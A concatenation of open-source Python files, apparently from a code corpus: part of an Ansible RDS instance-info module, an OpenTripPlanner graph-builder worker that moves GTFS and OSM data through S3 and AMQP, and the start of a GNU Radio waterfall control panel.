returned: always
type: string
sample: my-subnet-group
subnet_group_status:
description: Subnet group status
returned: always
type: string
sample: Complete
subnets:
description: List of subnets in the subnet group
returned: always
type: complex
contains:
subnet_availability_zone:
description: Availability zone of the subnet
returned: always
type: complex
contains:
name:
description: Name of the availability zone
returned: always
type: string
sample: us-west-2c
subnet_identifier:
description: Subnet ID
returned: always
type: string
sample: subnet-abcd1234
subnet_status:
description: Subnet status
returned: always
type: string
sample: Active
vpc_id:
description: VPC id of the subnet group
returned: always
type: string
sample: vpc-abcd1234
dbi_resource_id:
description: AWS Region-unique, immutable identifier for the DB instance
returned: always
type: string
sample: db-AAAAAAAAAAAAAAAAAAAAAAAAAA
domain_memberships:
description: List of domain memberships
returned: always
type: list
sample: []
endpoint:
description: Database endpoint
returned: always
type: complex
contains:
address:
description: Database endpoint address
returned: always
type: string
sample: helloworld-rds.ctrqpe3so1sf.us-west-2.rds.amazonaws.com
hosted_zone_id:
description: Route53 hosted zone ID
returned: always
type: string
sample: Z1PABCD0000000
port:
description: Database endpoint port
returned: always
type: int
sample: 5432
engine:
description: Database engine
returned: always
type: string
sample: postgres
engine_version:
description: Database engine version
returned: always
type: string
sample: 9.5.10
iam_database_authentication_enabled:
description: Whether database authentication through IAM is enabled
returned: always
type: bool
sample: false
instance_create_time:
description: Date and time the instance was created
returned: always
type: string
sample: '2017-10-10T04:00:07.434000+00:00'
kms_key_id:
description: KMS Key ID
returned: always
type: string
sample: arn:aws:kms:us-west-2:111111111111:key/abcd1234-0000-abcd-1111-0123456789ab
latest_restorable_time:
description: Latest time to which a database can be restored with point-in-time restore
returned: always
type: string
sample: '2018-05-17T00:03:56+00:00'
license_model:
description: License model
returned: always
type: string
sample: postgresql-license
master_username:
description: Database master username
returned: always
type: string
sample: dbadmin
monitoring_interval:
description: Interval, in seconds, between points when Enhanced Monitoring metrics are collected for the DB instance
returned: always
type: int
sample: 0
multi_az:
description: Whether Multi-AZ is on
returned: always
type: bool
sample: false
option_group_memberships:
description: List of option groups
returned: always
type: complex
contains:
option_group_name:
description: Option group name
returned: always
type: string
sample: default:postgres-9-5
status:
description: Status of option group
returned: always
type: string
sample: in-sync
pending_modified_values:
description: Modified values pending application
returned: always
type: complex
contains: {}
performance_insights_enabled:
description: Whether performance insights are enabled
returned: always
type: bool
sample: false
preferred_backup_window:
description: Preferred backup window
returned: always
type: string
sample: 04:00-05:00
preferred_maintenance_window:
description: Preferred maintenance window
returned: always
type: string
sample: mon:05:00-mon:05:30
publicly_accessible:
description: Whether the DB is publicly accessible
returned: always
type: bool
sample: false
read_replica_db_instance_identifiers:
description: List of database instance read replicas
returned: always
type: list
sample: []
storage_encrypted:
description: Whether the storage is encrypted
returned: always
type: bool
sample: true
storage_type:
description: Storage type of the Database instance
returned: always
type: string
sample: gp2
tags:
description: Tags used by the database instance
returned: always
type: complex
contains: {}
vpc_security_groups:
description: List of VPC security groups
returned: always
type: complex
contains:
status:
description: Status of the VPC security group
returned: always
type: string
sample: active
vpc_security_group_id:
description: VPC Security Group ID
returned: always
type: string
sample: sg-abcd1234
'''
from ansible.module_utils.aws.core import AnsibleAWSModule, is_boto3_error_code
from ansible.module_utils.ec2 import ansible_dict_to_boto3_filter_list, boto3_tag_list_to_ansible_dict, AWSRetry, camel_dict_to_snake_dict
try:
import botocore
except ImportError:
pass # handled by AnsibleAWSModule
def instance_facts(module, conn):
    """Describe RDS DB instances and return them as Ansible facts.

    Args:
        module: the AnsibleAWSModule being executed (supplies params and
            fail_json_aws).
        conn: a boto3 RDS client.

    Returns:
        dict with 'changed' (always False) and 'instances', a list of
        snake_cased instance descriptions with their tags attached.
    """
    describe_params = dict()
    identifier = module.params.get('db_instance_identifier')
    if identifier:
        describe_params['DBInstanceIdentifier'] = identifier
    user_filters = module.params.get('filters')
    if user_filters:
        describe_params['Filters'] = ansible_dict_to_boto3_filter_list(user_filters)
    paginator = conn.get_paginator('describe_db_instances')
    try:
        results = paginator.paginate(**describe_params).build_full_result()['DBInstances']
    except is_boto3_error_code('DBInstanceNotFound'):
        # a missing instance is not an error for an info module
        results = []
    except (botocore.exceptions.ClientError, botocore.exceptions.BotoCoreError) as e:  # pylint: disable=duplicate-except
        module.fail_json_aws(e, "Couldn't get instance information")
    for instance in results:
        try:
            tag_list = conn.list_tags_for_resource(ResourceName=instance['DBInstanceArn'],
                                                   aws_retry=True)['TagList']
            instance['Tags'] = boto3_tag_list_to_ansible_dict(tag_list)
        except (botocore.exceptions.ClientError, botocore.exceptions.BotoCoreError) as e:
            module.fail_json_aws(e, "Couldn't get tags for instance %s" % instance['DBInstanceIdentifier'])
    instances = [camel_dict_to_snake_dict(instance, ignore_list=['Tags']) for instance in results]
    return dict(changed=False, instances=instances)
def main():
    """Ansible entry point: collect RDS instance facts and exit the module."""
    module = AnsibleAWSModule(
        argument_spec=dict(
            db_instance_identifier=dict(aliases=['id']),
            filters=dict(type='dict')
        ),
        supports_check_mode=True,
    )
    rds_client = module.client('rds', retry_decorator=AWSRetry.jittered_backoff(retries=10))
    module.exit_json(**instance_facts(module, rds_client))


if __name__ == '__main__':
    main()
| gpl-3.0 |
Genovo/OTPSetup | otpsetup/graph_builder/handlers.py | 2 | 18125 | #!/usr/bin/python
from boto import connect_s3, connect_ec2
from boto.s3.key import Key
from kombu import Exchange
#from otpsetup.client.models import GtfsFile
from otpsetup import settings
from shutil import copyfileobj
from datetime import datetime
import os, socket, traceback, subprocess, builder, json, uuid
#import transformer
# Durable direct AMQP exchange shared by every publisher in this module.
exchange = Exchange("amq.direct", type="direct", durable=True)
# helper functions
def download_jar(otp_version):
    """Fetch the graph-builder jar for the given OTP version from S3.

    The jar is written to the fixed local resource path used by the
    graph-builder invocations in this module.
    """
    print("downloading jar for %s" % otp_version)
    s3_conn = connect_s3(settings.AWS_ACCESS_KEY_ID, settings.AWS_SECRET_KEY)
    resources = s3_conn.get_bucket('otpsetup-resources')
    jar_key = Key(resources)
    jar_key.key = '%s/graph-builder.jar' % otp_version
    jar_key.get_contents_to_filename('/var/otp/resources/otpgb/graph-builder.jar')
def get_req_name(request_id):
    """Build a timestamped, request-specific working-directory name."""
    timestamp = datetime.now().strftime("%F-%T")
    return "req{0}_{1}".format(request_id, timestamp)
def init_directory(req_name):
    """Create a fresh working directory under /mnt and return its path.

    Fails (os.makedirs raises) if the directory already exists.
    """
    work_dir = os.path.join("/mnt", req_name)
    os.makedirs(work_dir)
    return work_dir
def get_otp_version():
    """Extract the OTP version from the graph-builder jar's pom.properties.

    Unzips the maven pom.properties entry from the jar into /mnt and scans
    it for the 'version=' line.

    Returns:
        The version string, or 'n/a' if no version line is found.
    """
    pompropsfile = 'META-INF/maven/org.opentripplanner/opentripplanner-graph-builder/pom.properties'
    subprocess.call(['unzip', '-o', os.path.join(settings.GRAPH_BUILDER_RESOURCE_DIR, 'otpgb/graph-builder.jar'), pompropsfile, '-d', '/mnt'])
    version = 'n/a'
    # use a context manager: the original leaked the file handle
    with open(os.path.join('/mnt', pompropsfile), 'r') as pomprops:
        for line in pomprops:
            if line.startswith('version='):
                version = line[8:].rstrip()
                break
    return version
def gtfs_bucket(cache = {}):
    """Return the S3 bucket holding uploaded GTFS files, connecting once.

    The mutable default argument is deliberate: it acts as a per-process
    cache so the S3 connection is only made on the first call.
    """
    # original had a convoluted if/else with two duplicated return paths
    if 'bucket' not in cache:
        connection = connect_s3(settings.AWS_ACCESS_KEY_ID, settings.AWS_SECRET_KEY)
        cache['bucket'] = connection.get_bucket(settings.S3_BUCKET)
    return cache['bucket']
def managed_gtfs_bucket(cache = {}):
    """Return the S3 bucket for managed GTFS feeds, connecting once.

    The mutable default argument is deliberate: it acts as a per-process
    cache so the S3 connection is only made on the first call.
    """
    # original had a convoluted if/else with two duplicated return paths
    if 'bucket' not in cache:
        connection = connect_s3(settings.AWS_ACCESS_KEY_ID, settings.AWS_SECRET_KEY)
        cache['bucket'] = connection.get_bucket('gtfs-test')
    return cache['bucket']
def graph_bucket(cache = {}):
    """Return the S3 bucket for built graphs, connecting once.

    The mutable default argument is deliberate: it acts as a per-process
    cache so the S3 connection is only made on the first call.
    """
    # original had a convoluted if/else with two duplicated return paths
    if 'bucket' not in cache:
        connection = connect_s3(settings.AWS_ACCESS_KEY_ID, settings.AWS_SECRET_KEY)
        cache['bucket'] = connection.get_bucket(settings.GRAPH_S3_BUCKET)
    return cache['bucket']
def osm_bucket(cache = {}):
    """Return the S3 bucket for managed OSM extracts, connecting once.

    The mutable default argument is deliberate: it acts as a per-process
    cache so the S3 connection is only made on the first call.
    """
    # original had a convoluted if/else with two duplicated return paths
    if 'bucket' not in cache:
        connection = connect_s3(settings.AWS_ACCESS_KEY_ID, settings.AWS_SECRET_KEY)
        cache['bucket'] = connection.get_bucket('managed-osm')
    return cache['bucket']
def write_output_to_s3(key_text, output):
    """Write graph-builder output text to the graph bucket under key_text.

    The text is staged through a fixed scratch file because the boto Key
    API used here uploads from a filename.
    """
    outputfilename = '/mnt/gb_output'
    # context manager closes the scratch file even if write fails
    with open(outputfilename, 'w') as outputfile:
        outputfile.write(output)
    key = Key(graph_bucket())
    key.key = key_text
    key.set_contents_from_filename(outputfilename)
def download_managed_gtfs(directory, feeds):
    """Download each managed GTFS feed into <directory>/gtfs/<name>.zip.

    Args:
        directory: working directory for the current build request.
        feeds: list of dicts, each with a 'key' naming an object in the
            managed GTFS bucket.
    """
    bucket = managed_gtfs_bucket()
    print "feeds:"
    os.makedirs(os.path.join(directory, 'gtfs'))
    for feed in feeds:
        print " - %s" % feed['key']
        key = Key(bucket)
        key.key = feed['key']
        # NOTE(review): split('/')[-1] already drops the key prefix, so the
        # extra os.path.basename is a no-op here
        basename = os.path.basename(feed['key'].split('/')[-1])
        path = os.path.join(directory, 'gtfs', "%s.zip" % basename)
        key.get_contents_to_filename(path)
        print " - wrote %s" % path
# handler functions
# legacy support to create "preview" deployment. look into merging w/ "managed" deployment workflow below
def create_instance(conn, body):
    """Build a preview graph for a deployment request.

    Downloads the request's GTFS uploads from S3, generates an OSM extract
    and graph config, runs the graph builder, uploads the resulting
    Graph.obj plus a tarball of the working directory, and publishes a
    "graph_done" message describing the outcome.

    Args:
        conn: kombu connection used to publish result messages.
        body: message dict with 'request_id', 'files', 'extra_properties'
            and 'fare_factory'.

    Any exception is appended to /var/otp/gb_err_<id>_<timestamp> instead of
    propagating, so the consuming worker keeps running.
    """
    try:
        req_name = get_req_name(body['request_id']);
        directory = init_directory(req_name);
        # extract gtfs files
        os.makedirs(os.path.join(directory, 'gtfs'))
        files = body['files']
        extra_props_list = body['extra_properties']
        extra_props_dict = { }
        out = []  # NOTE(review): unused
        i = 0
        for s3_id in files:
            if s3_id is None:
                continue
            print "id: " + s3_id
            bucket = gtfs_bucket()
            key = Key(bucket)
            key.key = s3_id
            basename = os.path.basename(s3_id)
            path = os.path.join(directory, 'gtfs', basename)
            key.get_contents_to_filename(path)
            # i advances only for non-None ids -- assumes extra_properties is
            # aligned with the non-None entries of files; TODO confirm caller
            extra_props_dict[basename] = extra_props_list[i]
            i += 1
        # prepare and run graph builder
        builder.generate_osm_extract(directory)
        builder.generate_graph_config(directory, body['fare_factory'], extra_props_dict)
        gbresults = builder.run_graph_builder(directory)
        print "finished gb: %s" % gbresults['success']
        msgparams = { }
        msgparams['request_id'] = body['request_id']
        msgparams['success'] = gbresults['success']
        bucket = graph_bucket()
        if gbresults['success']:
            # upload the graph publicly, then delete the local copy
            key = Key(bucket)
            key.key = "uploads/%s/Graph_%s.obj" % (body['request_id'], datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%S"))
            graph_file = os.path.join(directory,'Graph.obj')
            key.set_contents_from_filename(graph_file)
            key.set_acl('public-read')
            msgparams['key'] = key.key
            subprocess.call(['rm', graph_file])
        msgparams['otp_version'] = get_otp_version()
        # create data tarball and upload to s3 (done even on failure, so the
        # inputs can be inspected / rebuilt later)
        tarball = os.path.join('/mnt', ('%s.tar.gz' % req_name))
        subprocess.call(['tar', 'czf', tarball, directory])
        key = Key(bucket)
        data_key = "data/%s.tar.gz" % req_name
        key.key = data_key
        key.set_contents_from_filename(tarball)
        msgparams['data_key'] = data_key
        # publish graph_done message
        publisher = conn.Producer(routing_key="graph_done", exchange=exchange)
        publisher.publish(msgparams)
        print 'published graph_done'
        # write gb output to file to s3
        write_output_to_s3("output/%s_output.txt" % req_name, gbresults['output'])
    except:
        # best-effort error log; the worker must not die on a bad request
        now = datetime.now()
        errfile = "/var/otp/gb_err_%s_%s" % (body['request_id'], now.strftime("%F-%T"))
        traceback.print_exc(file=open(errfile,"a"))
def process_gtfs(conn, body):
try:
print 'process_gtfs'
#print body['config']
#config = json.loads(body['config'])
directory = "/mnt/gtfs%s" % body['id']
bucket = managed_gtfs_bucket()
print "feeds:"
i = 0
agency_groups = { }
os.makedirs(os.path.join(directory, 'gtfs'))
for feed in body['feeds']:
feedId = feed['feedId']
print " - %s" % feedId
if 'defaultAgencyId' in feed:
agencyId = feed['defaultAgencyId']
if agencyId in agency_groups:
agency_groups[agencyId].append(feed)
else:
agency_groups[agencyId] = [ feed ]
else:
agencyId = "agency%s" % i
i = i + 1
agency_groups[agencyId] = [ feedId ]
print agency_groups
agency_keys = { }
agency_original_keys = { }
for agencyId in agency_groups:
print "%s: %s" % (agencyId, len(agency_groups[agencyId]))
agencyDir = os.path.join(directory, agencyId)
keyList = []
for feed in agency_groups[agencyId]:
keyList.append(feed['feedId'])
print "keyList: %s" % keyList
agency_original_keys[agencyId] = ",".join(keyList)
if len(agency_groups[agencyId]) > 1: # multiple feeds for agency -- shorten & merge required
# download & shorten feeds
os.makedirs(agencyDir)
shortened_paths = []
for feed in agency_groups[agencyId]:
feedId = feed['feedId']
print "downloading %s" % feedId
key = Key(bucket)
key.key = feedId
basename = os.path.basename(feedId)
path = os.path.join(agencyDir, "%s.zip" % basename)
key.get_contents_to_filename(path)
# shorten
print " shortening"
shortened_path = os.path.join(agencyDir, "%s_shortened.zip" % basename)
shorten_date = feed['expireOn'].replace("-","")
subprocess.call(['python', '/var/otp/resources/process_gtfs/shortenGtfsFeed.py', shorten_date, path, shortened_path])
shortened_paths.append(shortened_path)
print " shortened"
# merge
mergejarpath = "/var/otp/resources/process_gtfs/merger.jar"
#merge_cmd = ['java', '-Xms15G', '-Xmx15G', '-jar', mergejarpath, '--file=agency.txt', '--fuzzyDuplicates', '--file=routes.txt', '--fuzzyDuplicates', '--file=shapes.txt', '--fuzzyDuplicates', '--file=fare_attributes.txt', '--fuzzyDuplicates', '--file=fare_rules.txt', '--fuzzyDuplicates', '--file=transfers.txt', '--fuzzyDuplicates', '--file=calendar.txt', '--renameDuplicates', '--file=trips.txt', '--renameDuplicates']
merge_cmd = ['java', '-Xms15G', '-Xmx15G', '-jar', mergejarpath, '--file=agency.txt', '--fuzzyDuplicates', '--file=stops.txt', '--fuzzyDuplicates', '--file=routes.txt', '--fuzzyDuplicates', '--file=shapes.txt', '--fuzzyDuplicates', '--file=fare_attributes.txt', '--fuzzyDuplicates', '--file=fare_rules.txt', '--fuzzyDuplicates', '--file=transfers.txt', '--fuzzyDuplicates', '--file=calendar.txt', '--duplicateDetection=IDENTITY', '--renameDuplicates', '--file=trips.txt', '--duplicateDetection=IDENTITY', '--renameDuplicates']
merge_cmd.extend(shortened_paths)
merged_path = os.path.join(agencyDir, "merged.zip")
merge_cmd.append(merged_path)
print "merging"
subprocess.call(merge_cmd)
print "merged"
to_transform = merged_path
else: # single feed for agency ("standalone" feed) -- shorten only
os.makedirs(agencyDir)
feed = agency_groups[agencyId][0]
print "process standalone: %s" % feed['feedId']
key = Key(bucket)
key.key = feed['feedId']
basename = os.path.basename(feedId)
path = os.path.join(agencyDir, "%s.zip" % basename)
key.get_contents_to_filename(path)
# shorten
print " shortening"
shortened_path = os.path.join(agencyDir, "%s_shortened.zip" % basename)
shorten_date = feed['expireOn'].replace("-","")
subprocess.call(['python', '/var/otp/resources/process_gtfs/shortenGtfsFeed.py', shorten_date, path, shortened_path])
print " shortened"
to_transform = shortened_path
# transform
transformed_path = os.path.join(agencyDir, "transformed.zip")
transformjarpath = "/var/otp/resources/process_gtfs/transformer.jar"
transform_json = '{"op":"transform","class":"org.onebusaway.gtfs_transformer.updates.CalendarSimplicationStrategy"}'
transform_cmd = ['java', '-Xms15G', '-Xmx15G', '-jar', transformjarpath, '--transform=json:%s' % transform_json, to_transform, transformed_path ]
print "transforming"
subprocess.call(transform_cmd)
print "transformed"
# upload to s3
print "uploading to s3"
s3_key = "processed/%s" % uuid.uuid1()
key = Key(bucket)
key.key = s3_key
key.set_contents_from_filename(transformed_path)
# add key to list
agency_keys[agencyId] = s3_key
#else:
#
# # add standalone feed to list
# agency_keys[agencyId] = agency_groups[agencyId][0]
print agency_keys
# publish process_gtfs_done message
publisher = conn.Producer(routing_key="process_gtfs_done", exchange=exchange)
publisher.publish({ 'id' : body['id'], 'key_map' : agency_keys, 'original_keys_map' : agency_original_keys })
print "published p_g_d msg"
except:
now = datetime.now()
errfile = "/var/otp/gb_err_%s_%s" % (body['id'], now.strftime("%F-%T"))
traceback.print_exc(file=open(errfile,"a"))
traceback.print_exc()
def build_managed(conn, body):
    """Build the graph for a managed deployment.

    If the message carries no OSM key, a "build_managed_osm" message is
    published (with trigger_rebuild=True so this build re-runs afterwards)
    and the function returns. Otherwise the OTP jar, GTFS feeds and OSM
    extract are downloaded, the graph builder is run, the graph and its
    output log are uploaded to S3, and "managed_graph_done" is published.

    Args:
        conn: kombu connection used to publish messages.
        body: message dict with 'id', 'osm_key', 'feeds' and 'otp_version'.

    Exceptions are logged to /var/otp/gb_err_<id>_<timestamp> and swallowed.
    """
    try:
        print "build_managed"
        print "osm_key=%s" % body['osm_key']
        feeds = body['feeds']
        if body['osm_key'] is None or body['osm_key'] == "":
            # no extract yet: delegate to build_managed_osm and come back
            print "no osm key"
            publisher = conn.Producer(routing_key="build_managed_osm", exchange=exchange)
            publisher.publish({ 'id' : body['id'], 'feeds' : feeds, 'trigger_rebuild' : True, 'otp_version' : body['otp_version'] })
            return
        print "key exists, building"
        #config = json.loads(body['config'])
        # download jar for specified OTP version
        download_jar(body['otp_version'])
        # set up working directory
        req_name = "managed_%s" % get_req_name(body['id']);
        directory = init_directory(req_name);
        download_managed_gtfs(directory, feeds)
        # download osm extract
        bucket = osm_bucket()
        key = Key(bucket)
        key.key = body['osm_key']
        path = os.path.join(directory, 'extract.osm')
        key.get_contents_to_filename(path)
        # run graph builder
        builder.generate_graph_config_managed(directory, feeds)
        gbresults = builder.run_graph_builder(directory)
        graph_key = None
        timestamp = datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%S")
        # upload graph to S3 (only on success; graph_key stays None otherwise)
        if gbresults['success']:
            key = Key(graph_bucket())
            graph_key = "managed/%s/Graph_%s.obj" % (str(body['id']).zfill(6), timestamp)
            key.key = graph_key
            graph_file = os.path.join(directory,'Graph.obj')
            key.set_contents_from_filename(graph_file)
        # write gb output to file to s3 (always, so failures can be debugged)
        output_key = "managed/%s/output_%s.txt" % (str(body['id']).zfill(6), timestamp)
        write_output_to_s3(output_key, gbresults['output'])
        # publish managed_graph_done
        publisher = conn.Producer(routing_key="managed_graph_done", exchange=exchange)
        publisher.publish({ 'id' : body['id'], 'success' : gbresults['success'], 'graph_key' : graph_key, 'output_key' : output_key, 'otp_version' : get_otp_version() })
    except:
        now = datetime.now()
        errfile = "/var/otp/gb_err_%s_%s" % (body['id'], now.strftime("%F-%T"))
        traceback.print_exc(file=open(errfile,"a"))
        traceback.print_exc()
def build_managed_osm(conn, body):
    """Generate and upload an OSM extract for a managed deployment.

    Downloads the GTFS feeds (their coverage drives the extract bounds --
    presumably; builder.generate_osm_extract is opaque here, TODO confirm),
    uploads the resulting extract.osm to S3 and publishes
    "osm_extract_done". If trigger_rebuild is set, a follow-up
    "build_managed" message is published with the new osm_key.

    Args:
        conn: kombu connection used to publish messages.
        body: message dict with 'id', 'feeds', optional 'trigger_rebuild'
            and 'otp_version'.

    Exceptions are logged to /var/otp/gb_err_<id>_<timestamp> and swallowed.
    """
    try:
        print "build_managed_osm"
        req_name = "managed_%s" % get_req_name(body['id']);
        directory = init_directory(req_name);
        feeds = body['feeds']
        download_managed_gtfs(directory, feeds)
        builder.generate_osm_extract(directory)
        key = Key(osm_bucket())
        osm_key = "%s.osm" % body['id']
        key.key = osm_key
        key.set_contents_from_filename(os.path.join(directory, 'extract.osm'))
        print 'uploaded osm'
        publisher = conn.Producer(routing_key="osm_extract_done", exchange=exchange)
        publisher.publish({ 'id' : body['id'], 'osm_key' : osm_key })
        print 'published extract_osm_done'
        if 'trigger_rebuild' in body and body['trigger_rebuild'] is True:
            # chain straight into the graph build now that an extract exists
            publisher = conn.Producer(routing_key="build_managed", exchange=exchange)
            publisher.publish({ 'id' : body['id'], 'osm_key' : osm_key, 'feeds' : feeds, 'otp_version' : body['otp_version'] })
    except:
        now = datetime.now()
        errfile = "/var/otp/gb_err_%s_%s" % (body['id'], now.strftime("%F-%T"))
        traceback.print_exc(file=open(errfile,"a"))
        traceback.print_exc()
def rebuild_graph(conn, body):
    """Rebuild a graph from a previously archived data tarball.

    Downloads the tarball named by body['data_key'] (key format
    "data/<req_name>.tar.gz" -- the [5:][:-7] slicing strips that prefix
    and suffix), unpacks it over /, re-runs the graph builder in the
    restored working directory, uploads the new graph, and publishes
    "rebuild_graph_done".

    Args:
        conn: kombu connection used to publish the result message.
        body: message dict with 'request_id' and 'data_key'.

    Exceptions are logged to /var/otp/gb_err_<id>_<timestamp> and swallowed.
    """
    try:
        req_name = body['data_key'][5:][:-7]
        directory = os.path.join('/mnt', req_name)
        # download and extract data tarball
        bucket = graph_bucket()
        key = Key(bucket)
        key.key = body['data_key']
        tarball = '/mnt/data.tar.gz'
        key.get_contents_to_filename(tarball)
        # tarball stores absolute-style paths, hence extraction at /
        subprocess.call(['tar', 'xvf', tarball, '-C', '/'])
        # run graph builder
        gbresults = builder.run_graph_builder(directory)
        msgparams = { }
        msgparams['request_id'] = body['request_id']
        msgparams['success'] = gbresults['success']
        if gbresults['success']:
            #upload graph to s3
            key = Key(bucket)
            key.key = "uploads/%s/Graph_%s.obj" % (body['request_id'], datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%S"))
            graph_file = os.path.join(directory,'Graph.obj')
            key.set_contents_from_filename(graph_file)
            key.set_acl('public-read')
            msgparams['key'] = key.key
            subprocess.call(['rm', graph_file])
        msgparams['otp_version'] = get_otp_version()
        publisher = conn.Producer(routing_key="rebuild_graph_done", exchange=exchange)
        publisher.publish(msgparams)
        print 'published rebuild_graph_done'
        # write gb output to file to s3
        # NOTE(review): output key is the bare req_name here, unlike
        # create_instance which uses "output/<req_name>_output.txt" -- confirm
        # whether this asymmetry is intentional
        write_output_to_s3(req_name, gbresults['output'])
    except:
        now = datetime.now()
        errfile = "/var/otp/gb_err_%s_%s" % (body['request_id'], now.strftime("%F-%T"))
        traceback.print_exc(file=open(errfile,"a"))
| gpl-3.0 |
scalable-networks/gnuradio-3.7.2.1 | gr-wxgui/python/wxgui/waterfall_window.py | 11 | 10674 | #
# Copyright 2008 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
##################################################
# Imports
##################################################
import plotter
import common
import wx
import numpy
import math
import pubsub
from constants import *
from gnuradio import gr #for gr.prefs
import forms
##################################################
# Constants
##################################################
SLIDER_STEPS = 100 #number of discrete steps on the avg alpha log slider
AVG_ALPHA_MIN_EXP, AVG_ALPHA_MAX_EXP = -3, 0 #log10 bounds for the avg alpha slider
DEFAULT_FRAME_RATE = gr.prefs().get_long('wxgui', 'waterfall_rate', 30) #user-overridable via gr prefs
DEFAULT_COLOR_MODE = gr.prefs().get_string('wxgui', 'waterfall_color', 'rgb1') #must be one of COLOR_MODES below
DEFAULT_WIN_SIZE = (600, 300)
DIV_LEVELS = (1, 2, 5, 10, 20) #NOTE(review): not referenced in this file's visible code
MIN_DYNAMIC_RANGE, MAX_DYNAMIC_RANGE = 10, 200 #clip limits for the Dyn Range buttons
DYNAMIC_RANGE_STEP = 10. #fraction divisor for the Ref Level button step
COLOR_MODES = (
	('RGB1', 'rgb1'),
	('RGB2', 'rgb2'),
	('RGB3', 'rgb3'),
	('Gray', 'gray'),
)
##################################################
# Waterfall window control panel
##################################################
class control_panel(wx.Panel):
	"""
	A control panel with wx widgits to control the plotter and fft block chain.
	All state lives in the parent pubsub; widgets read/write it via ps/key.
	"""
	def __init__(self, parent):
		"""
		Create a new control panel.
		Args:
			parent: the wx parent window (a waterfall_window pubsub)
		"""
		self.parent = parent
		wx.Panel.__init__(self, parent, style=wx.SUNKEN_BORDER)
		#show/hide this panel whenever SHOW_CONTROL_PANEL_KEY changes
		parent[SHOW_CONTROL_PANEL_KEY] = True
		parent.subscribe(SHOW_CONTROL_PANEL_KEY, self.Show)
		control_box = wx.BoxSizer(wx.VERTICAL)
		control_box.AddStretchSpacer()
		options_box = forms.static_box_sizer(
			parent=self, sizer=control_box, label='Options',
			bold=True, orient=wx.VERTICAL,
		)
		#average
		forms.check_box(
			sizer=options_box, parent=self, label='Average',
			ps=parent, key=AVERAGE_KEY,
		)
		avg_alpha_text = forms.static_text(
			sizer=options_box, parent=self, label='Avg Alpha',
			converter=forms.float_converter(lambda x: '%.4f'%x),
			ps=parent, key=AVG_ALPHA_KEY, width=50,
		)
		avg_alpha_slider = forms.log_slider(
			sizer=options_box, parent=self,
			min_exp=AVG_ALPHA_MIN_EXP,
			max_exp=AVG_ALPHA_MAX_EXP,
			num_steps=SLIDER_STEPS,
			ps=parent, key=AVG_ALPHA_KEY,
		)
		#the alpha widgets are only enabled while averaging is on
		for widget in (avg_alpha_text, avg_alpha_slider):
			parent.subscribe(AVERAGE_KEY, widget.Enable)
			widget.Enable(parent[AVERAGE_KEY])
		#begin axes box
		control_box.AddStretchSpacer()
		axes_box = forms.static_box_sizer(
			parent=self, sizer=control_box, label='Axes Options',
			bold=True, orient=wx.VERTICAL,
		)
		#num lines buttons
		forms.incr_decr_buttons(
			parent=self, sizer=axes_box, label='Time Scale',
			on_incr=self._on_incr_time_scale, on_decr=self._on_decr_time_scale,
		)
		#dynamic range buttons
		forms.incr_decr_buttons(
			parent=self, sizer=axes_box, label='Dyn Range',
			on_incr=self._on_incr_dynamic_range, on_decr=self._on_decr_dynamic_range,
		)
		#ref lvl buttons
		forms.incr_decr_buttons(
			parent=self, sizer=axes_box, label='Ref Level',
			on_incr=self._on_incr_ref_level, on_decr=self._on_decr_ref_level,
		)
		#color mode
		forms.drop_down(
			parent=self, sizer=axes_box, width=100,
			ps=parent, key=COLOR_MODE_KEY, label='Color',
			choices=map(lambda x: x[1], COLOR_MODES),
			labels=map(lambda x: x[0], COLOR_MODES),
		)
		#autoscale
		forms.single_button(
			parent=self, sizer=axes_box, label='Autoscale',
			callback=self.parent.autoscale,
		)
		#clear
		control_box.AddStretchSpacer()
		forms.single_button(
			parent=self, sizer=control_box, label='Clear',
			callback=self._on_clear_button,
		)
		#run/stop
		forms.toggle_button(
			sizer=control_box, parent=self,
			true_label='Stop', false_label='Run',
			ps=parent, key=RUNNING_KEY,
		)
		#set sizer
		self.SetSizerAndFit(control_box)
	##################################################
	# Event handlers
	##################################################
	def _on_clear_button(self, event):
		"""Clear the waterfall by re-publishing NUM_LINES_KEY unchanged."""
		self.parent[NUM_LINES_KEY] = self.parent[NUM_LINES_KEY]
	def _on_incr_dynamic_range(self, event):
		"""Increase the dynamic range, clipped to MAX_DYNAMIC_RANGE."""
		self.parent[DYNAMIC_RANGE_KEY] = min(MAX_DYNAMIC_RANGE, common.get_clean_incr(self.parent[DYNAMIC_RANGE_KEY]))
	def _on_decr_dynamic_range(self, event):
		"""Decrease the dynamic range, clipped to MIN_DYNAMIC_RANGE."""
		self.parent[DYNAMIC_RANGE_KEY] = max(MIN_DYNAMIC_RANGE, common.get_clean_decr(self.parent[DYNAMIC_RANGE_KEY]))
	def _on_incr_ref_level(self, event):
		"""Raise the reference level by one dynamic-range step."""
		self.parent[REF_LEVEL_KEY] = self.parent[REF_LEVEL_KEY] + self.parent[DYNAMIC_RANGE_KEY]/DYNAMIC_RANGE_STEP
	def _on_decr_ref_level(self, event):
		"""Lower the reference level by one dynamic-range step."""
		self.parent[REF_LEVEL_KEY] = self.parent[REF_LEVEL_KEY] - self.parent[DYNAMIC_RANGE_KEY]/DYNAMIC_RANGE_STEP
	def _on_incr_time_scale(self, event):
		"""Slow the frame rate (floored at 1.0); if it cannot change, bump decimation."""
		old_rate = self.parent[FRAME_RATE_KEY]
		self.parent[FRAME_RATE_KEY] *= 0.75
		if self.parent[FRAME_RATE_KEY] < 1.0:
			self.parent[FRAME_RATE_KEY] = 1.0
		if self.parent[FRAME_RATE_KEY] == old_rate:
			self.parent[DECIMATION_KEY] += 1
	def _on_decr_time_scale(self, event):
		"""Speed the frame rate; if it cannot change, drop decimation."""
		old_rate = self.parent[FRAME_RATE_KEY]
		self.parent[FRAME_RATE_KEY] *= 1.25
		if self.parent[FRAME_RATE_KEY] == old_rate:
			self.parent[DECIMATION_KEY] -= 1
##################################################
# Waterfall window with plotter and control panel
##################################################
